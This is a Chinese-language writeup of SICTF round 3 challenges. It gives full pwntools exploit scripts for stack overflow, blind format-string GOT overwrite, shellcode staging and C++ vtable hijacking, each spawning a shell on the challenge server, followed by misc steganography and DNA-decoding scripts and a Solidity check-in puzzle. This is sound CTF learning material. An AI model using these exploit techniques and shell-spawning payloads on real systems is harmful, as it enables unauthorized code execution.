sictfr3_pwn_wp

ctf writeup

 2024/02/25 

pwn

[签到]stack

题目逻辑是这样的，其实就是找一个比 0x58 大很多，低一个字节小于 0x40的数，就能溢出了

char *run()
{
  char buf[76]; // [rsp+0h] [rbp-50h] BYREF
  size_t nbytes; // [rsp+4Ch] [rbp-4h]

  printf("Give me the length: ");
  LODWORD(nbytes) = get_int();
  if ( (unsigned __int8)nbytes > 0x40u )
  {
    puts("Too long!");
    exit(1);
  }
  printf("Give me your command: ");
  read(0, buf, (unsigned int)nbytes);
  return strdup(buf);
}

有一个 backdoor 函数，然后我看了一下没有 rdi的gadget

int __fastcall backdoor(const char *a1)
{
  if ( strncmp(a1, "give me flag", 0xCuLL) )
    return puts("Nope!");
  puts("You got!");
  return system(a1);
}

但是在call system前，因为strdup了一次 rax寄存器是一个堆上的地址，内容和read进去的数据一模一样的，所以可以构造一个 /bin/sh\x00 …… 这样一个payload，在 mov rdi,rax的时候就会取到binsh的地址，最后syscall

.text:00000000004011F0 48 8B 45 F8                   mov     rax, [rbp+s1]
.text:00000000004011F4 48 89 C7                      mov     rdi, rax                        ; command
.text:00000000004011F7 E8 64 FE FF FF                call    _system
.text:00000000004011F7

exp

from pwn import *
# from LibcSearcher import *
import itertools
import ctypes

context(os='linux', arch='amd64', log_level='debug')

is_debug = 0
IP = "yuanshen.life"
PORT = 33074

elf = context.binary = ELF('./pwn')
libc = elf.libc

def connect():
    return remote(IP, PORT) if not is_debug else process()

g = lambda x: gdb.attach(x)
s = lambda x: p.send(x)
sl = lambda x: p.sendline(x)
sa = lambda x, y: p.sendafter(x, y)
sla = lambda x, y: p.sendlineafter(x, y)
r = lambda x=None: p.recv() if x is None else p.recv(x)
rl = lambda: p.recvline()
ru = lambda x: p.recvuntil(x)
r_leak_libc_64 = lambda: u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
r_leak_libc_32 = lambda: u32(p.recvuntil(b'\xf7')[-4:])

p = connect()

# 313

backdoor = 0x4011F4

payload = b'/bin/sh\x00' +b'a' * (0x50)
payload += p64(backdoor)


sla("Give me the length: ","313")
# g(p)
sa("Give me your command: ",payload)

p.interactive()

Easy_SI

格式化字符串盲打，第一次做这种题，去学习了一下

https://wiki.mrskye.cn/Pwn/fmtstr/%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2%E7%9B%B2%E6%89%93/Bilnd_Pwn/#printf-plt

https://www.anquanke.com/post/id/196722#h2-6

思路是找到elf的基地址后，爆破所有可读的段，找到got表的位置，可以通过libc中的printf 后三位来判断got表中哪个是printf，然后把把printf_got 写成 system_got 最后输入binsh

from pwn import *
# from LibcSearcher import *
import itertools
import ctypes

context(os='linux', arch='amd64', log_level='debug')

is_debug = 1
IP = "yuanshen.life"
PORT = 33465

libc = ELF('./libc.so.6')

def connect():
    return remote(IP, PORT) if not is_debug else process()

g = lambda x: gdb.attach(x)
s = lambda x: p.send(x)
sl = lambda x: p.sendline(x)
sa = lambda x, y: p.sendafter(x, y)
sla = lambda x, y: p.sendlineafter(x, y)
r = lambda x=None: p.recv() if x is None else p.recv(x)
rl = lambda: p.recvline()
ru = lambda x: p.recvuntil(x)
r_leak_libc_64 = lambda: u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
r_leak_libc_32 = lambda: u32(p.recvuntil(b'\xf7')[-4:])

p = connect()


def leak_stack_fmt():
    return b"%p"

def show_stack(len):

    fmtstr = b""
    data_set = []
    for i in range(len):
        fmtstr += leak_stack_fmt() + b'-'

    sla("And now let's start the game!!!",fmtstr)

    for i in range(len):
        data_set.append(ru('-')[:-1].decode())

    for i in range(len):
        print(f"{str(i)} -> {data_set[i]}")


def leak_addr_fmt(addr):
    return b"%7$saaaa" + p64(addr)


def leak(addr):

    fmtstr = leak_addr_fmt(addr)
    sla("And now let's start the game!!!",fmtstr)

    try:
        leak = p.recvuntil('aaaa',timeout=0.6)
        return leak
    except Exception as e:
        return 0
        # print(f"error: -> {hex(addr)}")
        

def leak_elf(addr1,addr2):

    data_set = []
    addr_set = []
    got_addr_set = []
    got_content_set = [] 
    
    for i in range(addr1,addr2,8):
        data = leak(i)
        if data:
            addr_set.append(i)
            data_set.append(data)
    
    for i in range(len(data_set)):
        print(f"{hex(addr_set[i])} -> {data_set[i]}")

        if b'\x7f' in data_set[i]:
            got_addr_set.append(addr_set[i])
            got_content_set.append(data_set[i][1:-4])

    return got_addr_set,got_content_set


# show_stack(40)
#start -> 0x4010d0


# leak_elf(0x404000 - 0x30,0x404000 + 0x120)

# 0x403ff0 -> b'\n\xc0md\xbc~\x7faaaa'
# 0x403ff8 -> b'\naaaa'
# 0x404000 -> b'\n >@aaaa'
# 0x404008 -> b'\n\xe02\x88\xbc~\x7faaaa'
# 0x404010 -> b'\n`\xdc\x85\xbc~\x7faaaa'
# 0x404018 -> b'\nP\xdei\xbc~\x7faaaa'
# 0x404020 -> b'\n@\x10@aaaa'
# 0x404028 -> b'\n\xe0Oj\xbc~\x7faaaa'
# 0x404030 -> b'\n\xf0\xd6g\xbc~\x7faaaa'
# 0x404038 -> b'\n\xd0\x17s\xbc~\x7faaaa'
# 0x404040 -> b'\naaaa'
# 0x404048 -> b'\naaaa'
# 0x404050 -> b'\naaaa'
# 0x404058 -> b'\naaaa'
# 0x404060 -> b'\n\x80\x87\x83\xbc~\x7faaaa'
# 0x404068 -> b'\naaaa'
# 0x404070 -> b'\n\xa0z\x83\xbc~\x7faaaa'
# 0x404078 -> b'\naaaa'
# 0x404080 -> b'\n\xa0\x86\x83\xbc~\x7faaaa'
# 0x404088 -> b'\naaaa'
# 0x404090 -> b'\naaaa'

got_addr_set,got_content_set = leak_elf(0x403ff0,0x404088)
got_content_set = [u64(i.ljust(8,b'\x00')) for i in got_content_set]

for i in range(len(got_addr_set)):
    print(f"{hex(got_addr_set[i])} -> {hex(got_content_set[i])}")

print(hex(libc.sym['printf']))

# 0x404018 -> 0x7ff74be0de50
# 0x404028 -> 0x7ff74be14fe0
# 0x404030 -> 0x7ff74bded6f0
# 0x404038 -> 0x7ff74bea17d0
# 0x404060 -> 0x7ff74bfa8780
# 0x404070 -> 0x7ff74bfa7aa0
# 0x404080 -> 0x7ff74bfa86a0
# 0x606f0
got_addr_set,got_content_set = leak_elf(0x404030,0x404038)
got_content_set = [u64(i.ljust(8,b'\x00')) for i in got_content_set]

printf = got_content_set[0]

libc_base = printf - libc.sym['printf']
system = libc_base + libc.sym['system']

# print(hex(system))

payload = fmtstr_payload(6,{got_addr_set[0]:system},write_size='byte')
s(payload)




s(b"/bin/sh\x00\x00\x00")




p.interactive()

Bug_Zapper

最终目的是要走到run那执行mmap中的shellcode，要走到mmap那的话，输入长度最大 0x10，其实是在求 0x55 - 0x65 中哪个系统调用执行完rax是0，那就会走到run那，试了一下输入长度为11个字节，也就是系统调用号为0x50 + 0xb的系统调用执行完rax是0，会走到run那，思路是构造一个长度为11字节的 syscall read to 1919180的payload，跳到1919180那再read 一次，然后写shellcode

1
2
3

syscall                 ; LINUX - sys_read
cmp     rax, 10h
ja      short end

add     rax, 55h ; 'U'
xor     rdi, rdi        ; pathname
xor     rsi, rsi        ; mode
xor     rdx, rdx
syscall                 ; LINUX - sys_creat
cmp     rax, 0
jnz     short end

run:
xor     rbx, rbx
xor     rcx, rcx
xor     rdx, rdx
xor     rsi, rsi
xor     rdi, rdi
xor     r8, r8
xor     r9, r9
xor     r10, r10
xor     r11, r11
xor     r12, r12
xor     r13, r13
xor     r14, r14
xor     r15, r15
mov     rax, 1919810h
jmp     rax

from pwn import *
# from LibcSearcher import *
import itertools
import ctypes

context(os='linux', arch='amd64', log_level='debug')

is_debug = 0
IP = "yuanshen.life"
PORT = 35235

elf = context.binary = ELF('./bugzapper')
libc = elf.libc

def connect():
    return remote(IP, PORT) if not is_debug else process()

g = lambda x: gdb.attach(x)
s = lambda x: p.send(x)
sl = lambda x: p.sendline(x)
sa = lambda x, y: p.sendafter(x, y)
sla = lambda x, y: p.sendlineafter(x, y)
r = lambda x=None: p.recv() if x is None else p.recv(x)
rl = lambda: p.recvline()
ru = lambda x: p.recvuntil(x)
r_leak_libc_64 = lambda: u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
r_leak_libc_32 = lambda: u32(p.recvuntil(b'\xf7')[-4:])



p = connect()
# payload = 'a' * (0x10 - 5)


payload = asm('''
mov rsi,rax
xor eax,eax
xor edi,edi
xor edx,esi
syscall
''')

print(len(payload))

rl()
rl()
# g(p)
s(payload)


shellcode = asm('nop') * 0x20

shellcode +=asm('''
mov rax,0x68732f6e69622f
push rax
push rsp
pop rdi
xor esi,esi
xor edx,edx
mov eax,0x3b
syscall  
''')
time.sleep(0.7)
s(shellcode)



p.interactive()

Eeeeasy_Cpp

好耶，第一次做cpp pwn，在检查输入长度的时候用的函数是strlen，可以用\x00去绕过strlen，然后修改虚表地址劫持控制流，程序开了pie，给了一个main函数的地址，可以在read username的时候通过溢出修改 Challenge类中成员对象的地址为bss(用main函数算出基地址然后加偏移算出bss)的地址，然后虚表的地址为 bss + 0x10，read password的时候写backdoor的地址，这样就伪造了一个虚表，里面是backdoor，然后在call CHallenge::get的时候就会call到backdoor

from pwn import *
# from LibcSearcher import *
import itertools
import ctypes

context(os='linux', arch='amd64', log_level='debug')

is_debug = 1
IP = "yuanshen.life"
PORT = 36705

elf = context.binary = ELF('./EeeeasyCpp')
libc = elf.libc

def connect():
    return remote(IP, PORT) if not is_debug else process()

g = lambda x: gdb.attach(x)
s = lambda x: p.send(x)
sl = lambda x: p.sendline(x)
sa = lambda x, y: p.sendafter(x, y)
sla = lambda x, y: p.sendlineafter(x, y)
r = lambda x=None: p.recv() if x is None else p.recv(x)
rl = lambda: p.recvline()
ru = lambda x: p.recvuntil(x)
r_leak_libc_64 = lambda: u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
r_leak_libc_32 = lambda: u32(p.recvuntil(b'\xf7')[-4:])


def get_account(username,password):
    sla(">>","G")
    sla("Enter your name: ",username)
    sla("Enter your password: ",password)

def show_account():
    sla(">>","P")


p = connect()
ru("gift: ")
main = int(rl()[:-1],16)
elf_base = main - 0x2650
backdoor = elf_base + 0x22E0

success(f"main_addr -> {hex(main)}")
success(f"elf_base -> {hex(elf_base)}")
success(f"backdoor ->{hex(backdoor)}")

payload = b"aaaaaaa\x00" + b'b' * (0x28 - 0x8) + b'cccccccc'
# g(p)
get_account(payload,"123456")
show_account()
ru('cccccccc')
vtable = u64(rl()[:-1].ljust(8,b'\x00'))
success(f"vtable ->{hex(vtable)}")

bss = elf_base + 0x5000
success(f"bss ->{hex(bss)}")


payload = b"aaaaaaa\x00" + b'b' * (0x28 - 0x8) + b'cccccccc'
payload += p64(bss + 0x10) + p64(bss)
# g(p)
get_account(payload,p64(backdoor))

sla(">>","G")

p.interactive()

overflow

在输入的时候传了一个引用，可以覆盖实现一个任意地址值写，写stack_chk_fail的got为backdoor的地址，再覆盖canary触发stack_chk_fail就能劫持控制流了

1 2	std::operator>><char,std::char_traits<char>>(&std::cin); std::string::operator=(a1, v3);

__int64 __fastcall main(int a1, char **a2, char **a3)
{
  __int64 v4; // [rsp+10h] [rbp-60h]
  __int64 v5; // [rsp+18h] [rbp-58h]
  __int64 v6; // [rsp+20h] [rbp-50h]
  char v7[32]; // [rsp+48h] [rbp-28h] BYREF
  unsigned __int64 v8; // [rsp+68h] [rbp-8h]

  v8 = __readfsqword(0x28u);
  std::string::basic_string(v7, a2, a3);
  sub_4012C0(v7);
  v6 = std::operator<<<std::char_traits<char>>(&std::cout, "You said: ");
  v5 = std::operator<<<char>(v6, v7);
  std::operator<<<std::char_traits<char>>(v5, "\n");
  v4 = std::operator<<<std::char_traits<char>>(&std::cout, "Bye~");
  std::operator<<<std::char_traits<char>>(v4, "\n");
  std::string::~string(v7);
  return 0LL;
}

unsigned __int64 __fastcall sub_4012C0(__int64 a1)
{
  __int64 v1; // rax
  char v3[72]; // [rsp+10h] [rbp-50h] BYREF
  unsigned __int64 v4; // [rsp+58h] [rbp-8h]

  v4 = __readfsqword(0x28u);
  v1 = std::operator<<<std::char_traits<char>>(&std::cout, "What do you want to say?");
  std::operator<<<std::char_traits<char>>(v1, "\n");
  std::operator>><char,std::char_traits<char>>(&std::cin);
  std::string::operator=(a1, v3);
  return __readfsqword(0x28u);
}

exp

from pwn import *
# from LibcSearcher import *
import itertools
import ctypes

context(os='linux', arch='amd64', log_level='debug')

is_debug = 0
IP = "yuanshen.life"
PORT = 37133

elf = context.binary = ELF('./overflow')
libc = elf.libc

def connect():
    return remote(IP, PORT) if not is_debug else process()

g = lambda x: gdb.attach(x)
s = lambda x: p.send(x)
sl = lambda x: p.sendline(x)
sa = lambda x, y: p.sendafter(x, y)
sla = lambda x, y: p.sendlineafter(x, y)
r = lambda x=None: p.recv() if x is None else p.recv(x)
rl = lambda: p.recvline()
ru = lambda x: p.recvuntil(x)
r_leak_libc_64 = lambda: u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
r_leak_libc_32 = lambda: u32(p.recvuntil(b'\xf7')[-4:])

p = connect()

backdoor = 0x4011D0
bss = 0x404000

__stack_check_fail_got = elf.got['__stack_chk_fail']

# payload = p64(backdoor) * 12 + b'a' * (0x48) + p64(__stack_check_fail_got)
payload = p64(backdoor) * 12 +  (p64(__stack_check_fail_got) * 0x20)

# g(p)
sla("What do you want to say?\n",payload)


p.interactive()

misc

GeekChallege

和强网杯那个fuzz一样，爆破就好了

from pwn import *
import itertools
import ctypes

context(os='linux', arch='amd64', log_level='debug')

is_debug = 0
IP = "yuanshen.life"
PORT = 33591

def connect():
    return remote(IP, PORT) if not is_debug else process()

g = lambda x: gdb.attach(x)
s = lambda x: p.send(x)
sl = lambda x: p.sendline(x)
sa = lambda x, y: p.sendafter(x, y)
sla = lambda x, y: p.sendlineafter(x, y)
r = lambda x=None: p.recv() if x is None else p.recv(x)
rl = lambda: p.recvline()
ru = lambda x: p.recvuntil(x)
r_leak_libc_64 = lambda: u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
r_leak_libc_32 = lambda: u32(p.recvuntil(b'\xf7')[-4:])

p = connect()

tempfile = ['0'] * 114
charset = [chr(i) for i in range(32, 127)]

def check_success(tempfile, old_coverage):
    temp_str = ''.join(tempfile)
    sla(">", temp_str)
    new_coverage = rl()[:-1]
    
    if old_coverage != new_coverage:
        old_coverage = new_coverage
        return True, new_coverage
    return False, old_coverage

sla(">", ''.join(tempfile))
coverage = rl()[:-1]

passwd = []

for i in range(114):
    for j in charset:
        tempfile[i] = j
        success, coverage = check_success(tempfile, coverage)
        if success:
            passwd.append(j)
            break
        tempfile[i] = '0'

print(coverage)
print(passwd)

p.interactive()

WHO?WHO?WHO

搜索了一下是零宽隐写，用这个在线的网站就能解出来了

https://yuanfux.github.io/zero-width-web/

然后解出来是一个base64的编码，开头是openssl相关的特征，把openssl相关的所有decode都试了一遍，最后在rabbit decode那成功解出来了 key是shumu

1
2
3

U2FsdGVkX19uvldJ6CGUNff3B28QEdIjZqgUh98K+/0J16ELU8WVQydohw4P5+2M
jbhTLQHNOpcoOd7kSRgy8pwpovCmimdD8M0IbYUeXjNKYePL/WP4PCMaOJHAW3HR
b7IEoDDH1NYh3o5NwMmcFEqy1ujf72VgQIQkaeYFFFE=

搜了一下这个叫dna编码，密文和明文是一个映射关系

1	GTAGAGCTAGTCCTT{GGGTCACGGTTC_GGGTCACGGTTC_GAACGGTTC_GTAGTG_GCTTCA_GTAGACGTGGCGGTG_GTAGACTCA_TATGACCGG_GCTCGGGCT}

https://github.com/omemishra/DNA-Genetic-Python-Scripts-CTF

用这里的脚本改一下就能解出来了

mapping = {
    'AAA': 'a',
    'AAC': 'b',
    'AAG': 'c',
    'AAT': 'd',
    'ACA': 'e',
    'ACC': 'f',
    'ACG': 'g',
    'ACT': 'h',
    'AGA': 'i',
    'AGC': 'j',
    'AGG': 'k',
    'AGT': 'l',
    'ATA': 'm',
    'ATC': 'n',
    'ATG': 'o',
    'ATT': 'p',
    'CAA': 'q',
    'CAC': 'r',
    'CAG': 's',
    'CAT': 't',
    'CCA': 'u',
    'CCC': 'v',
    'CCG': 'w',
    'CCT': 'x',
    'CGA': 'y',
    'CGC': 'z',
    'CGG': 'A',
    'CGT': 'B',
    'CTA': 'C',
    'CTC': 'D',
    'CTG': 'E',
    'CTT': 'F',
    'GAA': 'G',
    'GAC': 'H',
    'GAG': 'I',
    'GAT': 'J',
    'GCA': 'K',
    'GCC': 'L',
    'GCG': 'M',
    'GCT': 'N',
    'GGA': 'O',
    'GGC': 'P',
    'GGG': 'Q',
    'GGT': 'R',
    'GTA': 'S',
    'GTC': 'T',
    'GTG': 'U',
    'GTT': 'V',
    'TAA': 'W',
    'TAC': 'X',
    'TAG': 'Y',
    'TAT': 'Z',
    'TCA': '1',
    'TCC': '2',
    'TCG': '3',
    'TCT': '4',
    'TGA': '5',
    'TGC': '6',
    'TGG': '7',
    'TGT': '8',
    'TTA': '9',
    'TTC': '0',
    'TTG': ' ',
    'TTT': '.'
}

decode_string = 'GTAGAGCTAGTCCTT{GGGTCACGGTTC_GGGTCACGGTTC_GAACGGTTC_GTAGTG_GCTTCA_GTAGACGTGGCGGTG_GTAGACTCA_TATGACCGG_GCTCGGGCT}'

def decode_dna(decode_string):
    result = []
    i = 0
    while i < len(decode_string):
        if decode_string[i] in "{}_":
            if decode_string[i] == '{':
                result.append('{')
            elif decode_string[i] == '}':
                result.append('}')
            elif decode_string[i] == '_':
                result.append('_')
            i += 1
        else:
            piece = decode_string[i:i + 3]
            if piece in mapping:
                result.append(mapping[piece])
                i += 3
            else:
                i += 1
    return "".join(result)

decoded_string = decode_dna(decode_string)

print(decoded_string)

blockchain

CheckinNewYear

这个RPC节点是操作私有链的入口，然后水龙头是一个获取货币的接口，要在谷歌浏览器装个metaMask的虚拟钱包插件，通过设置metaMask的网络使用rpc节点访问私有链，来和题目交互

https://ctf-wiki.org/blockchain/introduction/

ctfwiki这里有一些区块链相关的名词解释，区块链其实类似于一个分布式的数据库，然后智能合约是部署在链上的程序，如果更新链的状态(添加数据往链上部署智能合约调用智能合约程序)就会产生一笔交易，这个交易是要收取费用的，所以要通过水龙头获取足够多的货币再和题目进行交互。要开启挑战的话，首先要往一个指定的账户发货币，然后他会给一个地址，这个地址上有题目相关的程序，可以用Remix ide编译题目的代码，然后再 at address中填入题目给的合约地址，这样就能交互了

题目源码请通过nc获取
题目地址 （nc 连接）124.221.86.119 40001
RPC 节点(http) 124.221.86.119 40002
水龙头 124.221.86.119 40003

Can you make the isSolved() function return true?

[1] - Create an account which will be used to deploy the challenge contract
[2] - Deploy the challenge contract using your generated account
[3] - Get your flag once you meet the requirement
[4] - Show the contract source code
[-] input your choice:

题目的代码是这样的，要设置 NewYear为Happy 然后再调用 isSolved，这样再菜单中选择choice 3就能得到flag了，然后只有通过require(uint160(msg.sender) |
216 * 33 * 5 * 7 * 13 * 17 * 19 * 37 * 73 * 97 * 109 * 241 * 257 * 433 * 577 * 673 * 38737 * 487824887233 ==
2**2 * 17 * 67 * 733 * 316139 * 18992431891 * 72887484710091183279372959
,”Not this Year”); 这个cmp才能设置，这个cmp其实是在判断发起交易的人账户地址低位是不是 0x2024，如果不是那就走不到下边

// SPDX-License-Identifier: shu shao de xiao mi di
pragma solidity ^0.8.9;
contract HappyNewYear{
    string private NewYear;
    constructor(string memory _newyear )  {
        NewYear = _newyear;
    }
    function happyNewYear(string memory _newYear) public payable {
        require(uint160(msg.sender) |
        2**16 * 3**3 * 5 * 7 * 13 * 17 * 19 * 37 * 73 * 97 * 109 * 241 * 257 * 433 * 577 * 673 * 38737 * 487824887233 ==
        2**2 * 17 * 67 * 733 * 316139 * 18992431891 * 72887484710091183279372959
        ,"Not this Year");
        NewYear = _newYear;
    }

       function isSolved() public view returns (bool){
        require(keccak256(abi.encodePacked(NewYear)) == keccak256(abi.encodePacked("Happy")),"not HappyNewYear");
        return true;
    }

}